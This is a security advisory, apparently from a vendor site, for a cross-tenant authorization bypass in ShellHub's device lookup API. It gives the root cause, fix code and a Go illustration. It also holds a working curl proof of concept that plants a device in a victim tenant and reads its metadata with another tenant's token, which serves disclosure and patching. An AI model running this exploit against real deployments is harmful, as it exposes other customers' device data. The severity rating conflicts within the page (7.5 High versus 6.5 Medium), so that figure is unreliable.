CVE-2026-44424

CVE-2026-44424 is a medium-severity security vulnerability in github.com/shellhub-io/shellhub (go), affecting versions <= 0.24.1. It is fixed in 0.24.2.

Summary

GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace.

Severity

CVSS 3.1: 7.5 (High)
CWE-639, Authorization Bypass Through User-Controlled Key

Affected versions

ShellHub Community v0.24.1 (validated). Likely all prior versions that share this handler.

Root cause

In api/services/device.go:97-104, GetDevice resolves the device by UID without scoping the lookup to the caller's tenant:

func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {
    device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid))
    // ⚠️ missing: s.store.Options().InNamespace(tenant)
    ...
}

Compare with DeleteDevice in the same file (line 137), which correctly applies InNamespace(tenant).

The Authorize middleware (api/routes/middleware/authorize.go:12-27) only checks that a tenant is present in the context, not that the resource belongs to that tenant.

Proof of concept (validated live against v0.24.1)

Prerequisite: the attacker has any valid user account and knows a target tenant_id (UUIDs frequently leak via UI URLs, email invites, support channels, or prior namespace membership).

ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"attacker","password":"..."}' | jq -r .token)

TARGET_TENANT="<victim-tenant-uuid>"

# Plant a device in the victim tenant via the public device-auth endpoint
# (this also works when the victim already has devices and the attacker
# merely guessed/obtained a real UID via another vector)
VICTIM_UID=$(curl -s -X POST http://target/api/devices/auth \
  -H 'Content-Type: application/json' \
  -d "{
    \"info\":{\"id\":\"x\",\"pretty_name\":\"x\",\"version\":\"v0.24.1\",\"arch\":\"amd64\",\"platform\":\"docker\"},
    \"hostname\":\"poc\",
    \"identity\":{\"mac\":\"aa:bb:cc:dd:ee:ff\"},
    \"public_key\":\"-----BEGIN RSA PUBLIC KEY-----\\nx\\n-----END RSA PUBLIC KEY-----\",
    \"tenant_id\":\"$TARGET_TENANT\"
  }" | jq -r .uid)

# Read the device from a completely different tenant
curl -i "http://target/api/devices/$VICTIM_UID" \
  -H "Authorization: Bearer $ATTACKER_TOKEN"
# Expected (fixed):   HTTP 403/404
# Observed (v0.24.1): HTTP 200 + full device JSON (tenant_id, public_key, MAC,
#                     namespace name, OS info, last_seen, remote_addr, ...)

Impact

  • Cross-tenant disclosure of device metadata: hostname, MAC, OS fingerprint, public SSH key, namespace name, last-seen timestamp, remote address.
  • Enables namespace enumeration, device inventory reconnaissance of other tenants, and targeted follow-up attacks.

CVE-2026-44424 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.24.2); upgrading removes the vulnerable code path.

Affected versions

github.com/shellhub-io/shellhub (<= 0.24.1)

Security releases

github.com/shellhub-io/shellhub → 0.24.2 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

In api/services/device.go GetDevice, extract tenant from context and apply InNamespace:

func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {
    tenant := gateway.TenantFromContext(ctx)
    opts := []store.QueryOption{}
    if tenant != nil {
        opts = append(opts, s.store.Options().InNamespace(tenant.ID))
    }
    device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid), opts...)
    ...
}
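To make the tenant-scoping fix concrete, here is an added, self-contained Go model (not ShellHub's code) of the two lookup paths side by side: an in-memory store with a hypothetical QueryOption shaped like the project's, an unscoped resolve that reproduces the vulnerable handler, and a scoped resolve that applies the InNamespace option from the tenant in the request context and fails closed when no tenant is present. The Device fields, the store contents and the tenant names are constructed for the example.

```go
package main

import "context"
import "errors"

type (
	Device      struct{ UID, TenantID, Hostname string } // constructed sample, not ShellHub's model
	QueryOption func(d *Device) bool                     // imitates store.QueryOption's shape (hypothetical)
	Store       struct{ devices map[string]*Device }     // in-memory stand-in for the database store
	tenantKey   struct{}                                 // ctx key the gateway stores the caller's tenant under
)

var ErrDeviceNotFound = errors.New("device not found")

// InNamespace is the scoping option the fix adds: keep only devices in this tenant.
func InNamespace(tenant string) QueryOption {
	return func(d *Device) bool { return d.TenantID == tenant }
}

// DeviceResolve finds a device by UID; a failing option yields the same "not found"
// as a missing UID, so a foreign tenant's UID is indistinguishable from a bogus one.
func (s *Store) DeviceResolve(uid string, opts ...QueryOption) (*Device, error) {
	d, ok := s.devices[uid]
	if !ok {
		return nil, ErrDeviceNotFound
	}
	for _, opt := range opts {
		if !opt(d) {
			return nil, ErrDeviceNotFound
		}
	}
	return d, nil
}

// WithTenant stands in for the gateway placing the caller's tenant in ctx.
func WithTenant(ctx context.Context, tenant string) context.Context { return context.WithValue(ctx, tenantKey{}, tenant) }

// GetDeviceUnscoped mirrors the vulnerable handler: the tenant in ctx is never consulted.
func GetDeviceUnscoped(_ context.Context, s *Store, uid string) (*Device, error) { return s.DeviceResolve(uid) }

// GetDeviceScoped mirrors the remediation and fails closed when ctx carries no tenant.
func GetDeviceScoped(ctx context.Context, s *Store, uid string) (*Device, error) {
	tenant, ok := ctx.Value(tenantKey{}).(string)
	if !ok || tenant == "" {
		return nil, errors.New("no tenant in context")
	}
	return s.DeviceResolve(uid, InNamespace(tenant))
}
```

Returning the same not-found error for a foreign UID and for a nonexistent one is deliberate: a distinct 403 would let a caller confirm that a guessed UID exists in some other namespace.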

Frequently Asked Questions

  1. What is CVE-2026-44424? CVE-2026-44424 is a medium-severity security vulnerability in github.com/shellhub-io/shellhub (go), affecting versions <= 0.24.1. It is fixed in 0.24.2.
  2. How severe is CVE-2026-44424? CVE-2026-44424 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/shellhub-io/shellhub are affected by CVE-2026-44424? github.com/shellhub-io/shellhub (go) versions <= 0.24.1 are affected.
  4. Is there a fix for CVE-2026-44424? Yes. CVE-2026-44424 is fixed in 0.24.2. Upgrade to this version or later.
  5. Is CVE-2026-44424 exploitable, and should I be worried? Whether CVE-2026-44424 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-44424 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44424? Upgrade github.com/shellhub-io/shellhub to 0.24.2 or later.
